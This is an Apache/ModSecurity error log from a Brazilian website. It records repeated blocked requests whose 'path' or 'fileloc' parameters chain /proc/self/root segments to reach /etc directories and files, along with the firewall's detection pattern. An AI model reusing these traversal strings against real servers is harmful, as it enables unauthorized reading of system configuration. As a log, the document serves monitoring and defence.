https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 04:45:30.593043 2026] [:error] [pid 7893:tid 140411641214720] [client 74.7.243.128:47046] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz7GhCii7xarUs8iHZABwAAAgw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:47:34.322185 2026] [:error] [pid 21219:tid 140411683178240] [client 74.7.243.128:34208] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz7lvXLqtnMIWvjpaJ0RgAAAoc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:47:46.678939 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.243.128:32778] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz7ota6ubjKNq_cu4aqZgAAA0I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 04:48:06.928853 2026] [:error] [pid 21219:tid 140411565680384] [client 74.7.243.128:54740] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz7tvXLqtnMIWvjpaJ0WwAAApU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 04:48:23.991139 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.243.128:52906] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz7x9a6ubjKNq_cu4aqnAAAA0I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:48:35.425848 2026] [mime_magic:error] [pid 7893:tid 140411691570944] (70014)End of file found: [client 74.7.243.128:53052] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/var/cache/man
[Fri Mar 20 04:48:56.152720 2026] [:error] [pid 10189:tid 140411607643904] [client 74.7.243.128:40544] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz76DJ3M9BSuKP7CAbsmQAAAJA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 04:49:02.224435 2026] [:error] [pid 21219:tid 140411641214720] [client 74.7.243.128:55196] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz77vXLqtnMIWvjpaJ0kgAAAow"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 04:49:06.330807 2026] [:error] [pid 21219:tid 140411548894976] [client 74.7.243.128:46032] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz78fXLqtnMIWvjpaJ0mAAAApc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 04:49:26.412804 2026] [:error] [pid 31215:tid 140411624429312] [client 74.7.243.128:46036] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz8BgF0L0L-SsrnPo5DfwAAAs4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:49:39.139808 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.243.128:43314] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz8E9a6ubjKNq_cu4aqzAAAA0s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 04:49:43.988378 2026] [:error] [pid 31215:tid 140411574073088] [client 74.7.243.128:42620] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz8FwF0L0L-SsrnPo5DmwAAAtQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 04:49:59.072440 2026] [:error] [pid 15826:tid 140411565680384] [client 74.7.243.128:42636] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz8J-oXxyEfFpUF8f9dhwAAAVU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 04:51:13.153473 2026] [:error] [pid 26799:tid 140411658000128] [client 74.7.243.128:50932] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz8cda6ubjKNq_cu4arZQAAA0o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:51:26.439395 2026] [:error] [pid 15826:tid 140411548894976] [client 74.7.243.128:47262] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz8fuoXxyEfFpUF8f9duAAAAVc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 04:51:30.047720 2026] [:error] [pid 10189:tid 140411649607424] [client 74.7.243.128:34088] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz8gjJ3M9BSuKP7CAbtDwAAAIs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:52:11.321162 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.241.31:43572] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/polkit-1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz8q9a6ubjKNq_cu4ar3wAAA1M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:52:15.962710 2026] [:error] [pid 31215:tid 140411607643904] [client 74.7.243.128:39024] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz8rwF0L0L-SsrnPo5EDwAAAtA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 04:52:17.272068 2026] [:error] [pid 11642:tid 140411548894976] [client 74.7.243.128:57744] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz8sbninkcc-iUj5Ao5pwAAA5c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:52:21.860918 2026] [:error] [pid 11167:tid 140411582465792] [client 74.7.243.128:57758] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz8tfHIg5MgXLBnicPWZgAAAdM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:52:28.543091 2026] [:error] [pid 21219:tid 140411632822016] [client 74.7.241.31:44082] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/anacrontab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz8vPXLqtnMIWvjpaJ1LAAAAo0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:52:31.351592 2026] [:error] [pid 15826:tid 140411649607424] [client 74.7.243.128:54886] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz8v-oXxyEfFpUF8f9d5gAAAUs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
